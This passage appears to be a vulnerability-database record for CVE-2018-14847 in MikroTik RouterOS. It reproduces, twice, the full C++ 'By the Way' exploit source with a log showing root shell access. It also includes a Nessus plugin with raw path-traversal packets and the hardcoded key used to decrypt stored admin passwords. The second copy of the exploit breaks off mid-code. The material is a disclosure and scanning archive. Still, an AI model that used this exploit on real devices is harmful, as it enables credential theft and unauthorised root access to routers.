shell on Mikrotik devices running RouterOS versions:\r\n\r\nLongterm: 6.30.1 - 6.40.7\r\nStable: 6.29 - 6.42\r\nBeta: 6.29rc1 - 6.43rc3\r\n\r\nThe exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway\r\n\r\nThe exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an \"option\" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user \"devel\" with the admin's password.\r\n\r\nMikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:\r\n\r\nhttps://blog.mikrotik.com/security/winbox-vulnerability.html\r\n\r\nNote that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.\r\n\r\n# Usage Example\r\n\r\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\r\nTrying 192.168.1.251...\r\nConnected to 192.168.1.251.\r\nEscape character is '^]'.\r\nPassword: \r\nLogin failed, incorrect username or password\r\n\r\nConnection closed by foreign host.\r\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251\r\n\r\n \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\r\n \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\r\n \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \r\n\r\n[+] Extracting passwords from 192.168.1.251:8291\r\n[+] Searching for administrator credentials \r\n[+] Using credentials - admin:lol\r\n[+] Creating /pckg/option on 192.168.1.251:8291\r\n[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291\r\n[+] There's a light 
on\r\nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251\r\nTrying 192.168.1.251...\r\nConnected to 192.168.1.251.\r\nEscape character is '^]'.\r\nPassword: \r\n\r\n\r\nBusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n\r\n# uname -a\r\nLinux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown\r\n# cat /rw/logs/VERSION\r\nv6.38.4 Mar/08/2017 09:26:17\r\n# Connection closed by foreign host.\r\n*/\r\n#include <sstream>\r\n#include <cstdlib>\r\n#include <iostream>\r\n#include <boost/cstdint.hpp>\r\n#include <boost/program_options.hpp>\r\n\r\n#include \"winbox_session.hpp\"\r\n#include \"winbox_message.hpp\"\r\n#include \"md5.hpp\"\r\n\r\nnamespace\r\n{\r\n const char s_version[] = \"By the Way 1.0.0\";\r\n\r\n /*!\r\n * Parses the command line arguments. The program will always use two\r\n * parameters (ip and winbox port) but the port will default to 8291 if\r\n * not present on the CLI\r\n *\r\n * \\param[in] p_arg_count the number of arguments on the command line\r\n * \\param[in] p_arg_array the arguments passed on the command line\r\n * \\param[in,out] p_ip the ip address to connect to\r\n * \\param[in,out] p_winbox_port the winbox port to connect to\r\n * \\return true if we have valid ip and ports. 
false otherwise.\r\n */\r\n bool parseCommandLine(int p_arg_count, const char* p_arg_array[],\r\n std::string& p_ip, std::string& p_winbox_port)\r\n {\r\n boost::program_options::options_description description(\"options\");\r\n description.add_options()\r\n (\"help,h\", \"A list of command line options\")\r\n (\"version,v\", \"Display version information\")\r\n (\"winbox-port,w\", boost::program_options::value<std::string>()->default_value(\"8291\"), \"The winbox port\")\r\n (\"ip,i\", boost::program_options::value<std::string>(), \"The ip to connect to\");\r\n\r\n boost::program_options::variables_map argv_map;\r\n try\r\n {\r\n boost::program_options::store(\r\n boost::program_options::parse_command_line(\r\n p_arg_count, p_arg_array, description), argv_map);\r\n }\r\n catch (const std::exception& e)\r\n {\r\n std::cerr << e.what() << \"\\n\" << std::endl;\r\n std::cerr << description << std::endl;\r\n return false;\r\n }\r\n\r\n boost::program_options::notify(argv_map);\r\n if (argv_map.empty() || argv_map.count(\"help\"))\r\n {\r\n std::cerr << description << std::endl;\r\n return false;\r\n }\r\n\r\n if (argv_map.count(\"version\"))\r\n {\r\n std::cerr << \"Version: \" << ::s_version << std::endl;\r\n return false;\r\n }\r\n\r\n if (argv_map.count(\"ip\") && argv_map.count(\"winbox-port\"))\r\n {\r\n p_ip.assign(argv_map[\"ip\"].as<std::string>());\r\n p_winbox_port.assign(argv_map[\"winbox-port\"].as<std::string>());\r\n return true;\r\n }\r\n else\r\n {\r\n std::cerr << description << std::endl;\r\n }\r\n\r\n return false;\r\n }\r\n\r\n /*!\r\n * This function uses the file disclosure vulnerability, CVE-2018-14847, to\r\n * download the user database from /flash/rw/store/user.dat\r\n *\r\n * \\param[in] p_ip the address of the router to connect to\r\n * \\param[in] p_winbox_port the winbox port to connect to\r\n * \\return a string containing the user.dat data or an empty string on error\r\n */\r\n std::string getPasswords(const std::string& p_ip, const 
std::string& p_winbox_port)\r\n {\r\n std::cout << \"[+] Extracting passwords from \" << p_ip << \":\" << p_winbox_port << std::endl;\r\n Winbox_Session winboxSession(p_ip, p_winbox_port);\r\n if (!winboxSession.connect())\r\n {\r\n std::cerr << \"[!] Failed to connect to the remote host\" << std::endl;\r\n return std::string();\r\n }\r\n\r\n WinboxMessage msg;\r\n msg.set_to(2, 2);\r\n msg.set_command(7);\r\n msg.set_request_id(1);\r\n msg.set_reply_expected(true);\r\n msg.add_string(1, \"//./.././.././../flash/rw/store/user.dat\");\r\n winboxSession.send(msg);\r\n\r\n msg.reset();\r\n if (!winboxSession.receive(msg))\r\n {\r\n std::cerr << \"[!] Error receiving an open file response.\" << std::endl;\r\n return std::string();\r\n }\r\n\r\n boost::uint32_t sessionID = msg.get_session_id();\r\n boost::uint16_t file_size = msg.get_u32(2);\r\n if (file_size == 0)\r\n {\r\n std::cerr << \"[!] File size is 0\" << std::endl;\r\n return std::string();\r\n }\r\n\r\n msg.reset();\r\n msg.set_to(2, 2);\r\n msg.set_command(4);\r\n msg.set_request_id(2);\r\n msg.set_reply_expected(true);\r\n msg.set_session_id(sessionID);\r\n msg.add_u32(2, file_size);\r\n winboxSession.send(msg);\r\n\r\n msg.reset();\r\n if (!winboxSession.receive(msg))\r\n {\r\n std::cerr << \"[!] Error receiving a file content response.\" << std::endl;\r\n return std::string();\r\n }\r\n\r\n return msg.get_raw(0x03);\r\n }\r\n\r\n /*!\r\n * Looks through the user.dat file for an enabled administrative account that\r\n * we can use. 
Once a useful account is found the password is decrypted.\r\n *\r\n * \\param[in] p_user_dat the user.dat file data\r\n * \\param[in,out] p_username stores the found admin username\r\n * \\param[in,out] p_password stores the found admin password\r\n * \\return true on success and false otherwrise\r\n */\r\n bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)\r\n {\r\n std::cout << \"[+] Searching for administrator credentials \" << std::endl;\r\n\r\n // the dat file is a series of nv::messages preceded by a two byte length\r\n std::string dat(p_user_dat);\r\n while (dat.size() > 4)\r\n {\r\n boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);\r\n if (dat[2] != 'M' || dat[3] != '2')\r\n {\r\n // this is mild insanity but the .dat file messages don't line\r\n // up properly if a new user is added or whatever.\r\n dat.erase(0, 1);\r\n continue;\r\n }\r\n dat.erase(0, 4);\r\n length -= 4;\r\n\r\n if (length > dat.size())\r\n {\r\n return false;\r\n }\r\n\r\n std::string entry(dat.data(), length);\r\n dat.erase(0, length);\r\n\r\n WinboxMessage msg;\r\n msg.parse_binary(entry);\r\n\r\n // we need an active admin account\r\n // 0x2 has three groups: 1 (read), 2 (write), 3 (full)\r\n if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)\r\n {\r\n p_username.assign(msg.get_string(1));\r\n\r\n std::string encrypted_pass(msg.get_string(0x11));\r\n if (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0)\r\n {\r\n std::string hash_this(p_username);\r\n hash_this.append(\"283i4jfkai3389\");\r\n\r\n MD5 md5;\r\n md5.update(hash_this.c_str(), hash_this.size());\r\n md5.finalize();\r\n std::string md5_hash(md5.getDigest());\r\n\r\n for (std::size_t i = 0; i < encrypted_pass.size(); i++)\r\n {\r\n boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];\r\n if (decrypted == 0)\r\n {\r\n // a null terminator! 
We did it.\r\n return true;\r\n }\r\n p_password.push_back(decrypted);\r\n }\r\n p_password.clear();\r\n }\r\n }\r\n }\r\n return false;\r\n }\r\n}\r\n\r\n/*!\r\n * This function creates the file /pckg/option on the target. This will enable\r\n * the developer login on Telnet and SSH. Oddly, you'll first need to log in\r\n * to Telnet for SSH to work, but I digress...\r\n *\r\n * \\param[in] p_ip the ip address of the router\r\n * \\param[in] p_port the port of the jsproxy we'll connect to\r\n * \\param[in] p_username the username we'll authenticate with\r\n * \\param[in] p_password the password we'll authenticate with\r\n * \\return true if we successfully created the file.\r\n */\r\nbool create_file(const std::string& p_ip, const std::string& p_port,\r\n const std::string& p_username, const std::string& p_password)\r\n{\r\n Winbox_Session mproxy_session(p_ip, p_port);\r\n if (!mproxy_session.connect())\r\n {\r\n std::cerr << \"[-] Failed to connect to the remote host\" << std::endl;\r\n return false;\r\n }\r\n\r\n boost::uint32_t p_session_id = 0;\r\n if (!mproxy_session.login(p_username, p_password, p_session_id))\r\n {\r\n std::cerr << \"[-] Login failed.\" << std::endl;\r\n return false;\r\n }\r\n\r\n std::cout << \"[+] Creating /pckg/option on \" << p_ip << \":\" << p_port << std::endl;\r\n\r\n WinboxMessage msg;\r\n msg.set_to(2, 2);\r\n msg.set_command(1);\r\n msg.set_request_id(1);\r\n msg.set_reply_expected(true);\r\n msg.set_session_id(p_session_id);\r\n msg.add_string(1, \"//./.././.././../pckg/option\");\r\n mproxy_session.send(msg);\r\n\r\n msg.reset();\r\n mproxy_session.receive(msg);\r\n if (msg.has_error())\r\n {\r\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\r\n return false;\r\n }\r\n\r\n std::cout << \"[+] Creating /flash/nova/etc/devel-login on \" << p_ip << \":\" << p_port << std::endl;\r\n msg.reset();\r\n msg.set_to(2, 2);\r\n msg.set_command(1);\r\n msg.set_request_id(2);\r\n msg.set_reply_expected(true);\r\n 
msg.set_session_id(p_session_id);\r\n msg.add_string(1, \"//./.././.././../flash/nova/etc/devel-login\");\r\n mproxy_session.send(msg);\r\n\r\n msg.reset();\r\n mproxy_session.receive(msg);\r\n if (msg.has_error())\r\n {\r\n std::cout << \"[-] \" << msg.get_error_string() << std::endl;\r\n return false;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nint main(int p_argc, const char** p_argv)\r\n{\r\n std::string ip;\r\n std::string winbox_port;\r\n if (!parseCommandLine(p_argc, p_argv, ip, winbox_port))\r\n {\r\n return EXIT_FAILURE;\r\n }\r\n\r\n std::cout << std::endl;\r\n std::cout << \" \u2554\u2557 \u252c \u252c \u250c\u252c\u2510\u252c \u252c\u250c\u2500\u2510 \u2566 \u2566\u250c\u2500\u2510\u252c \u252c\" << std::endl;\r\n std::cout << \" \u2560\u2569\u2557\u2514\u252c\u2518 \u2502 \u251c\u2500\u2524\u251c\u2524 \u2551\u2551\u2551\u251c\u2500\u2524\u2514\u252c\u2518\" << std::endl;\r\n std::cout << \" \u255a\u2550\u255d \u2534 \u2534 \u2534 \u2534\u2514\u2500\u2518 \u255a\u2569\u255d\u2534 \u2534 \u2534 \" << std::endl;\r\n std::cout << std::endl;\r\n\r\n // step one - do the file disclosure\r\n std::string user_dat(getPasswords(ip, winbox_port));\r\n if (user_dat.empty())\r\n {\r\n return EXIT_FAILURE;\r\n }\r\n\r\n // step two - parse the password\r\n std::string admin_username;\r\n std::string admin_password;\r\n if (!get_password(user_dat, admin_username, admin_password))\r\n {\r\n std::cout << \"[-] Failed to find admin creds. 
Trying default.\" << std::endl;\r\n admin_username.assign(\"admin\");\r\n admin_password.assign(\"\");\r\n }\r\n\r\n std::cout << \"[+] Using credentials - \" << admin_username << \":\" << admin_password << std::endl;\r\n\r\n // step three - create the file\r\n if (!create_file(ip, winbox_port, admin_username, admin_password))\r\n {\r\n return EXIT_FAILURE;\r\n }\r\n\r\n std::cout << \"[+] There's a light on\" << std::endl;\r\n return EXIT_SUCCESS;\r\n}", "sourceHref": "https://www.exploit-db.com/raw/45578", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "nessus": [{"lastseen": "2023-05-20T14:40:26", "description": "The remote networking device is running a version of MikroTik RouterOS vulnerable to an unauthenticated arbitrary file read and write vulnerability. An unauthenticated attacker could leverage this vulnerability to read or write protected files on the affected host.\nNessus was able to exploit this vulnerability to retrieve the device credential store.", "cvss3": {}, "published": "2018-09-06T00:00:00", "type": "nessus", "title": "MikroTik RouterOS Winbox Unauthenticated Arbitrary File Read/Write Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:mikrotik:routeros"], "id": "MIKROTIK_CVE_2018-14847.NASL", "href": "https://www.tenable.com/plugins/nessus/117335", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117335);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2018-14847\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/01\");\n\n script_name(english:\"MikroTik RouterOS Winbox Unauthenticated Arbitrary File Read/Write Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote 
networking device is affected by an unauthenticated\narbitrary file read/write vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote networking device is running a version of MikroTik\nRouterOS vulnerable to an unauthenticated arbitrary file read and\nwrite vulnerability. An unauthenticated attacker could leverage this\nvulnerability to read or write protected files on the affected host.\nNessus was able to exploit this vulnerability to retrieve the device\ncredential store.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/BasuCert/WinboxPoC\");\n script_set_attribute(attribute:\"see_also\", value:\"https://n0p.me/winbox-bug-dissection/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.mikrotik.com/security/winbox-vulnerability.html\");\n # https://github.com/tenable/routeros/blob/master/bug_hunting_in_routeros_derbycon_2018.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25ba70ca\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MikroTik RouterOS 6.40.8 / 6.42.1 / 6.43rc4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-14847\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Vulnerability allows reads and writes to the file system\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/23\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mikrotik:routeros\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mikrotik_winbox_detect.nasl\");\n script_require_ports(\"Services/mikrotik_winbox\");\n\n exit(0);\n}\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\nfunction pw_dec(user, pass)\n{\n local_var key, i, dec_pass = '';\n key = MD5(user + '283i4jfkai3389');\n for (i = 0; i < strlen(pass); i++)\n {\n dec_pass += raw_string(ord(pass[i]) ^ ord(key[i % strlen(key)]));\n }\n if (stridx(dec_pass, '\\0') <= 0)\n return dec_pass;\n else\n return substr(dec_pass, 0, stridx(dec_pass, '\\0') - 1);\n}\n\npkt_a = 'h\\x01\\x00fM2\\x05\\x00\\xff\\x01\\x06\\x00\\xff\\t\\x05\\x07\\x00\\xff\\t\\x07\\x01\\x00\\x00!5/////./..//////./..//////./../flash/rw/store/user.dat\\x02\\x00\\xff\\x88\\x02\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\xff\\x88\\x02\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00';\n\npkt_b = ';\\x01\\x009M2\\x05\\x00\\xff\\x01\\x06\\x00\\xff\\t\\x06\\x01\\x00\\xfe\\t5\\x02\\x00\\x00\\x08\\x00\\x80\\x00\\x00\\x07\\x00\\xff\\t\\x04\\x02\\x00\\xff\\x88\\x02\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\xff\\x88\\x02\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00';\n\nport = get_service(svc:\"mikrotik_winbox\", exit_on_fail:TRUE);\nuserlist = {};\n\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port);\n\nsend(socket:soc, data:pkt_a);\nres = recv(socket:soc, length:1024);\nif (!res || strlen(res) < 39)\n{\n close(soc);\n 
audit(AUDIT_RESP_NOT, port);\n}\npkt_b[19] = res[38];\n\nsend(socket:soc, data:pkt_b);\nres = recv(socket:soc, length:1024);\nclose(soc);\nif (!res || stridx(res, '\\x01\\x00\\x00\\x21') == -1)\n audit(AUDIT_LISTEN_NOT_VULN,'MikroTik RouterOS' , port);\n\nforeach entry (split(substr(res, 55), sep:\"M2\", keep:FALSE))\n{\n if (strlen(entry) == 0) continue;\n str = strstr(entry, '\\x01\\x00\\x00\\x21');\n pwstr = strstr(entry, '\\x11\\x00\\x00\\x21');\n if (str && pwstr)\n {\n userlist[substr(str, 5, 4 + ord(str[4]))] = substr(pwstr, 5, 4 + ord(pwstr[4]));\n }\n}\n\nif (userlist)\n{\n report = '';\n report += '\\nNessus was able to enumerate the following username and password pairs\\nfrom the user.dat file:';\n foreach username (keys(userlist))\n {\n report += '\\n Username: ' + data_protection::sanitize_userpass(text:username);\n report += '\\n Password: ' + data_protection::sanitize_userpass(text:pw_dec(user:username, pass:userlist[username])) + '\\n';\n }\n\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse\n audit(AUDIT_LISTEN_NOT_VULN,'MikroTik RouterOS' , port);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-10-11T02:15:57", "description": "", "cvss3": {}, "published": "2018-10-10T00:00:00", "type": "packetstorm", "title": "Mikrotik RouterOS Remote Root", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-10T00:00:00", "id": "PACKETSTORM:149742", "href": "https://packetstormsecurity.com/files/149742/Mikrotik-RouterOS-Remote-Root.html", "sourceData": "`/* \n# Exploit Title: RouterOS Remote Rooting \n# Date: 10/07/2018 \n# Exploit Author: Jacob Baines \n# Vendor Homepage: www.mikrotik.com \n# Software Link: https://mikrotik.com/download \n# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3 \n# Tested on: RouterOS Various \n# CVE : CVE-2018-14847 \n \nBy the Way is an exploit coded in C++ that enables a root shell on 
Mikrotik devices running RouterOS versions: \n \nLongterm: 6.30.1 - 6.40.7 \nStable: 6.29 - 6.42 \nBeta: 6.29rc1 - 6.43rc3 \n \nThe exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway \n \nThe exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an \"option\" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user \"devel\" with the admin's password. \n \nMikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here: \n \nhttps://blog.mikrotik.com/security/winbox-vulnerability.html \n \nNote that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials. \n \n# Usage Example \n \nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251 \nTrying 192.168.1.251... \nConnected to 192.168.1.251. \nEscape character is '^]'. \nPassword: \nLogin failed, incorrect username or password \n \nConnection closed by foreign host. \nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251 \n \naa a! a! aa!aa! a!aaa a| a|aaaa! a! \na a(c)aaa!a a aaa$?aa$? aaaaaa$?aa!a \naaa a' a' a' a'aaa aa(c)aa' a' a' \n \n[+] Extracting passwords from 192.168.1.251:8291 \n[+] Searching for administrator credentials \n[+] Using credentials - admin:lol \n[+] Creating /pckg/option on 192.168.1.251:8291 \n[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291 \n[+] There's a light on \nalbinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251 \nTrying 192.168.1.251... \nConnected to 192.168.1.251. \nEscape character is '^]'. \nPassword: \n \n \nBusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash) \nEnter 'help' for a list of built-in commands. 
\n \n# uname -a \nLinux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown \n# cat /rw/logs/VERSION \nv6.38.4 Mar/08/2017 09:26:17 \n# Connection closed by foreign host. \n*/ \n#include <sstream> \n#include <cstdlib> \n#include <iostream> \n#include <boost/cstdint.hpp> \n#include <boost/program_options.hpp> \n \n#include \"winbox_session.hpp\" \n#include \"winbox_message.hpp\" \n#include \"md5.hpp\" \n \nnamespace \n{ \nconst char s_version[] = \"By the Way 1.0.0\"; \n \n/*! \n* Parses the command line arguments. The program will always use two \n* parameters (ip and winbox port) but the port will default to 8291 if \n* not present on the CLI \n* \n* \\param[in] p_arg_count the number of arguments on the command line \n* \\param[in] p_arg_array the arguments passed on the command line \n* \\param[in,out] p_ip the ip address to connect to \n* \\param[in,out] p_winbox_port the winbox port to connect to \n* \\return true if we have valid ip and ports. false otherwise. \n*/ \nbool parseCommandLine(int p_arg_count, const char* p_arg_array[], \nstd::string& p_ip, std::string& p_winbox_port) \n{ \nboost::program_options::options_description description(\"options\"); \ndescription.add_options() \n(\"help,h\", \"A list of command line options\") \n(\"version,v\", \"Display version information\") \n(\"winbox-port,w\", boost::program_options::value<std::string>()->default_value(\"8291\"), \"The winbox port\") \n(\"ip,i\", boost::program_options::value<std::string>(), \"The ip to connect to\"); \n \nboost::program_options::variables_map argv_map; \ntry \n{ \nboost::program_options::store( \nboost::program_options::parse_command_line( \np_arg_count, p_arg_array, description), argv_map); \n} \ncatch (const std::exception& e) \n{ \nstd::cerr << e.what() << \"\\n\" << std::endl; \nstd::cerr << description << std::endl; \nreturn false; \n} \n \nboost::program_options::notify(argv_map); \nif (argv_map.empty() || argv_map.count(\"help\")) \n{ \nstd::cerr << description << 
std::endl; \nreturn false; \n} \n \nif (argv_map.count(\"version\")) \n{ \nstd::cerr << \"Version: \" << ::s_version << std::endl; \nreturn false; \n} \n \nif (argv_map.count(\"ip\") && argv_map.count(\"winbox-port\")) \n{ \np_ip.assign(argv_map[\"ip\"].as<std::string>()); \np_winbox_port.assign(argv_map[\"winbox-port\"].as<std::string>()); \nreturn true; \n} \nelse \n{ \nstd::cerr << description << std::endl; \n} \n \nreturn false; \n} \n \n/*! \n* This function uses the file disclosure vulnerability, CVE-2018-14847, to \n* download the user database from /flash/rw/store/user.dat \n* \n* \\param[in] p_ip the address of the router to connect to \n* \\param[in] p_winbox_port the winbox port to connect to \n* \\return a string containing the user.dat data or an empty string on error \n*/ \nstd::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port) \n{ \nstd::cout << \"[+] Extracting passwords from \" << p_ip << \":\" << p_winbox_port << std::endl; \nWinbox_Session winboxSession(p_ip, p_winbox_port); \nif (!winboxSession.connect()) \n{ \nstd::cerr << \"[!] Failed to connect to the remote host\" << std::endl; \nreturn std::string(); \n} \n \nWinboxMessage msg; \nmsg.set_to(2, 2); \nmsg.set_command(7); \nmsg.set_request_id(1); \nmsg.set_reply_expected(true); \nmsg.add_string(1, \"//./.././.././../flash/rw/store/user.dat\"); \nwinboxSession.send(msg); \n \nmsg.reset(); \nif (!winboxSession.receive(msg)) \n{ \nstd::cerr << \"[!] Error receiving an open file response.\" << std::endl; \nreturn std::string(); \n} \n \nboost::uint32_t sessionID = msg.get_session_id(); \nboost::uint16_t file_size = msg.get_u32(2); \nif (file_size == 0) \n{ \nstd::cerr << \"[!] 
File size is 0\" << std::endl; \nreturn std::string(); \n} \n \nmsg.reset(); \nmsg.set_to(2, 2); \nmsg.set_command(4); \nmsg.set_request_id(2); \nmsg.set_reply_expected(true); \nmsg.set_session_id(sessionID); \nmsg.add_u32(2, file_size); \nwinboxSession.send(msg); \n \nmsg.reset(); \nif (!winboxSession.receive(msg)) \n{ \nstd::cerr << \"[!] Error receiving a file content response.\" << std::endl; \nreturn std::string(); \n} \n \nreturn msg.get_raw(0x03); \n} \n \n/*! \n* Looks through the user.dat file for an enabled administrative account that \n* we can use. Once a useful account is found the password is decrypted. \n* \n* \\param[in] p_user_dat the user.dat file data \n* \\param[in,out] p_username stores the found admin username \n* \\param[in,out] p_password stores the found admin password \n* \\return true on success and false otherwise \n*/ \nbool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password) \n{ \nstd::cout << \"[+] Searching for administrator credentials \" << std::endl; \n \n// the dat file is a series of nv::messages preceded by a two byte length \nstd::string dat(p_user_dat); \nwhile (dat.size() > 4) \n{ \nboost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]); \nif (dat[2] != 'M' || dat[3] != '2') \n{ \n// this is mild insanity but the .dat file messages don't line \n// up properly if a new user is added or whatever. 
\ndat.erase(0, 1); \ncontinue; \n} \ndat.erase(0, 4); \nlength -= 4; \n \nif (length > dat.size()) \n{ \nreturn false; \n} \n \nstd::string entry(dat.data(), length); \ndat.erase(0, length); \n \nWinboxMessage msg; \nmsg.parse_binary(entry); \n \n// we need an active admin account \n// 0x2 has three groups: 1 (read), 2 (write), 3 (full) \nif (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false) \n{ \np_username.assign(msg.get_string(1)); \n \nstd::string encrypted_pass(msg.get_string(0x11)); \nif (!encrypted_pass.empty() && msg.get_u32(0x1f) != 0) \n{ \nstd::string hash_this(p_username); \nhash_this.append(\"283i4jfkai3389\"); \n \nMD5 md5; \nmd5.update(hash_this.c_str(), hash_this.size()); \nmd5.finalize(); \nstd::string md5_hash(md5.getDigest()); \n \nfor (std::size_t i = 0; i < encrypted_pass.size(); i++) \n{ \nboost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()]; \nif (decrypted == 0) \n{ \n// a null terminator! We did it. \nreturn true; \n} \np_password.push_back(decrypted); \n} \np_password.clear(); \n} \n} \n} \nreturn false; \n} \n} \n \n/*! \n* This function creates the file /pckg/option on the target. This will enable \n* the developer login on Telnet and SSH. Oddly, you'll first need to log in \n* to Telnet for SSH to work, but I digress... \n* \n* \\param[in] p_ip the ip address of the router \n* \\param[in] p_port the port of the jsproxy we'll connect to \n* \\param[in] p_username the username we'll authenticate with \n* \\param[in] p_password the password we'll authenticate with \n* \\return true if we successfully created the file. 
\n*/ \nbool create_file(const std::string& p_ip, const std::string& p_port, \nconst std::string& p_username, const std::string& p_password) \n{ \nWinbox_Session mproxy_session(p_ip, p_port); \nif (!mproxy_session.connect()) \n{ \nstd::cerr << \"[-] Failed to connect to the remote host\" << std::endl; \nreturn false; \n} \n \nboost::uint32_t p_session_id = 0; \nif (!mproxy_session.login(p_username, p_password, p_session_id)) \n{ \nstd::cerr << \"[-] Login failed.\" << std::endl; \nreturn false; \n} \n \nstd::cout << \"[+] Creating /pckg/option on \" << p_ip << \":\" << p_port << std::endl; \n \nWinboxMessage msg; \nmsg.set_to(2, 2); \nmsg.set_command(1); \nmsg.set_request_id(1); \nmsg.set_reply_expected(true); \nmsg.set_session_id(p_session_id); \nmsg.add_string(1, \"//./.././.././../pckg/option\"); \nmproxy_session.send(msg); \n \nmsg.reset(); \nmproxy_session.receive(msg); \nif (msg.has_error()) \n{ \nstd::cout << \"[-] \" << msg.get_error_string() << std::endl; \nreturn false; \n} \n \nstd::cout << \"[+] Creating /flash/nova/etc/devel-login on \" << p_ip << \":\" << p_port << std::endl; \nmsg.reset(); \nmsg.set_to(2, 2); \nmsg.set_command(1); \nmsg.set_request_id(2); \nmsg.set_reply_expected(true); \nmsg.set_session_id(p_session_id); \nmsg.add_string(1, \"//./.././.././../flash/nova/etc/devel-login\"); 